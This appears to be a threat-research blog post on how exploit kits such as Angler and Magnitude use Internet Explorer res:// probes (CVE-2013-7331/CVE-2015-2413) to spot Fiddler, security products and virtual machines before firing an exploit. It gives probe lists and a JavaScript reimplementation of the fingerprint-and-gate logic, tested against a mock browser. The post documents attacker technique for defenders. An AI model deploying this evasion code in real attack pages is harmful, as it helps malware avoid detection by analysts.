2014-10-02 - Exploit Integration
CVE-2013-7331/CVE-2015-2413 (onload variant) and Exploit Kits
Thanks to EKWatcher and his decoding skills saving me a lot of time.
As we see more and more of those "XMLDOM" checks in exploit kits, I decided to write down here some of the checks spotted. This is a fast-moving area and it will be hard to keep this up to date, but it may give an idea of how the technique is being used.
Magnitude EK:
2015-09 [CVE-2015-2413 onload res:// variant ]
I won't detail this, as this part of the code disappeared around the end of November 2015, then reappeared in the middle of March 2016 inside the redirector in front of Magnitude.
See: http://pastebin.com/raw/gfEz25fa (from 2016-03-30)
Angler EK:
2015-05-16 [Edit: I know that some of the information here is not totally exact]
[Edit 2: this appears to be something that was unpatched at that time and that has since been fixed along with the bug covered by CVE-2015-2413]
+= "Malwarebytes Anti-Exploit\\mbae.exe", "Malwarebytes Anti-Malware\\mbam.exe", "FiddlerCoreAPI\\FiddlerCore.dll"
[Image: Angler EK checks integrate MBAE and MBAM]
2014-11-25
+=
'res://C:\\Program Files\\Fiddler2\\Fiddler.exe/#3/#32512',
'res://C:\\Program Files (x86)\\Fiddler2\\Fiddler.exe/#3/#32512'
http://pastebin.com/BFWxLu22
2014-10-11
+ Avoids firing CVE-2013-2551 if a Symantec product is detected (maybe also for CVE-2014-0322; I didn't check).
+ Checks for:
'res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567',
'res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996',
'res://C:\\Program Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110',
'res://C:\\Program Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204'];
http://pastebin.com/EAKZk43e 2014-10-01
Previously:
http://pastebin.com/pzx2xPDJ 2014-08-23
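To make the "onload variant" concrete, here is an added example (written for this page; it is not code from Angler, Magnitude or any of the pastes above) of how a kit turns the res:// list into a decision. In Internet Explorer, a `res://<module>/#<resource type>/#<resource id>` URI addresses a resource inside an on-disk PE file (type #2 is RT_BITMAP, #3 is RT_ICON and id #32512 is IDI_APPLICATION, the default application icon), so assigning it as the `src` of an `<img>` fires `onload` when the file and resource exist and `onerror` otherwise. That behaviour is IE-specific, so the code takes a `document` object and ships with a constructed mock that simulates IE; the probe list reuses only the fully qualified res:// URIs shown in the Angler entries (the Malwarebytes entries appear on this page only as partial paths, so they are left out), and the "skip the exploit on any hit" rule is my generalisation of the Symantec gating noted for 2014-10-11.

```javascript
// Added example, not code from any exploit kit or from this page.
// Models the res:// "onload variant": probe res:// URIs via <img> onload/onerror,
// then decide whether to fire the exploit. Only works for real in Internet
// Explorer; mockIeDocument() below simulates IE so this runs under Node.

// Probe targets taken from the Angler lists above, grouped by what a hit means.
const PROBES = {
  analysisTools: [
    "res://C:\\Program Files\\Fiddler2\\Fiddler.exe/#3/#32512",
    "res://C:\\Program Files (x86)\\Fiddler2\\Fiddler.exe/#3/#32512",
  ],
  virtualMachines: [
    "res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#26567",
    "res://C:\\Program Files\\VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/#30996",
    "res://C:\\Program Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/#110",
    "res://C:\\Program Files\\Parallels\\Parallels Tools\\Applications\\setup_nativelook.exe/#2/#204",
  ],
};

// Split a res:// URI into module path, resource type (#2 RT_BITMAP, #3 RT_ICON)
// and resource id (#32512 is IDI_APPLICATION). Returns null for anything else.
function parseResUri(uri) {
  const m = /^res:\/\/(.+?)\/#(\d+)\/#(\d+)$/.exec(uri);
  if (!m) return null;
  return { module: m[1], resourceType: Number(m[2]), resourceId: Number(m[3]) };
}

// One probe, the way the kits do it: attach onload/onerror BEFORE setting src,
// because IE may fire the handlers as soon as the resource is resolved.
function probe(doc, uri) {
  return new Promise((resolve) => {
    const img = doc.createElement("img");
    img.onload = () => resolve(true);
    img.onerror = () => resolve(false);
    img.src = uri;
  });
}

// Run every probe and return the modules found per category plus the gating
// decision. Assumption (my generalisation of the Symantec check on this page):
// any hit in any category holds the exploit back.
async function fingerprint(doc, probes = PROBES) {
  const found = {};
  for (const [category, uris] of Object.entries(probes)) {
    const hits = [];
    for (const uri of uris) {
      if (await probe(doc, uri)) {
        const mod = parseResUri(uri).module;
        if (!hits.includes(mod)) hits.push(mod); // two resources of one exe count once
      }
    }
    found[category] = hits;
  }
  const anyHit = Object.values(found).some((h) => h.length > 0);
  return { found, fireExploit: !anyHit };
}

// Constructed stand-in for an IE document: `present` lists the module paths
// that "exist" on the victim; every other res:// URI errors out.
function mockIeDocument(present) {
  return {
    createElement() {
      const el = {};
      Object.defineProperty(el, "src", {
        set(uri) {
          const parsed = parseResUri(uri);
          const ok = parsed !== null && present.includes(parsed.module);
          // IE fires the handler asynchronously; a microtask mimics that.
          Promise.resolve().then(() => (ok ? el.onload : el.onerror)());
        },
      });
      return el;
    },
  };
}

// Usage: a victim with Fiddler installed is fingerprinted and the exploit is held back.
fingerprint(mockIeDocument(["C:\\Program Files\\Fiddler2\\Fiddler.exe"])).then((r) =>
  console.log(JSON.stringify(r))
);
```

The only thing a defender needs from this model is the shape of the traffic it never generates: the probes are resolved locally by the res:// handler, so nothing leaves the host and the only observable is the kit's subsequent choice of exploit (or silence), which is why the pastes above were the practical way to track the lists.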
Astrum EK:
http://pastebin.com/PfAjuvPR 2014-09-06
Nuclear Pack:
Gathering samples by browsing requires hardening too. Nuclear Pack tries to detect VMWare now. pic.twitter.com/W9Z1bgUJyv
— kafeine (@kafeine) September 28, 2014
Read more:
Attackers abusing Internet Explorer to enumerate software and detect security products - Jaime Blasco - AlienVault - 2014-07-25
Software enumeration using Internet Explorer - 2014-10-21 - HiddenCodes